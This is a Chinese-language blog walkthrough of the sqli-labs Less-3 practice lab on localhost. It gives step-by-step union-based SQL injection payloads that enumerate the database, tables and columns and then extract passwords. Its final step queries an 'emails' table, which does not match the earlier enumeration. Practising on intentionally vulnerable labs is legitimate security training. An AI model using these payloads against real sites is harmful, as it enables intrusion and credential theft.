Sqli-labs 3

hacker_17Z2024-07-11 23:44

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
QD.Joker18 分钟前
日志收集工具-logstash
数据库·elk
RR13351 小时前
图标统计页面的设计与控件 Apache echarts
前端·apache·echarts
2401_836836592 小时前
mongodb数据库应用
数据库·mongodb
gs801402 小时前
机房断电后 etcd 启动失败的排查与快速恢复实录
数据库·etcd
烟雨归来3 小时前
19c补丁后oracle属主变化,导致不能识别磁盘组
数据库·oracle
厚衣服_34 小时前
第7篇:中间件全链路监控与 SQL 性能分析实践
数据库·sql·中间件
伤不起bb4 小时前
NoSQL 之 Redis 集群
数据库·redis·nosql
迷途思凡4 小时前
各数据库字段类型统计
数据库
大数据魔法师4 小时前
MongoDB(八) - MongoDB GridFS介绍及使用Python操作GridFS
数据库·python·mongodb
热门推荐
01Coze扣子平台完整体验和实践(附国内和国际版对比)02【图像处理与机器视觉】XJTU期末考点03KGG转MP3工具|非KGM文件|解密音频04从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑05YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07零代码入门 | Coze——让大模型接入自己的数据库08海康Visionmaster-常见问题排查方法-启动阶段09DeepSeek各版本说明与优缺点分析10R-tree详解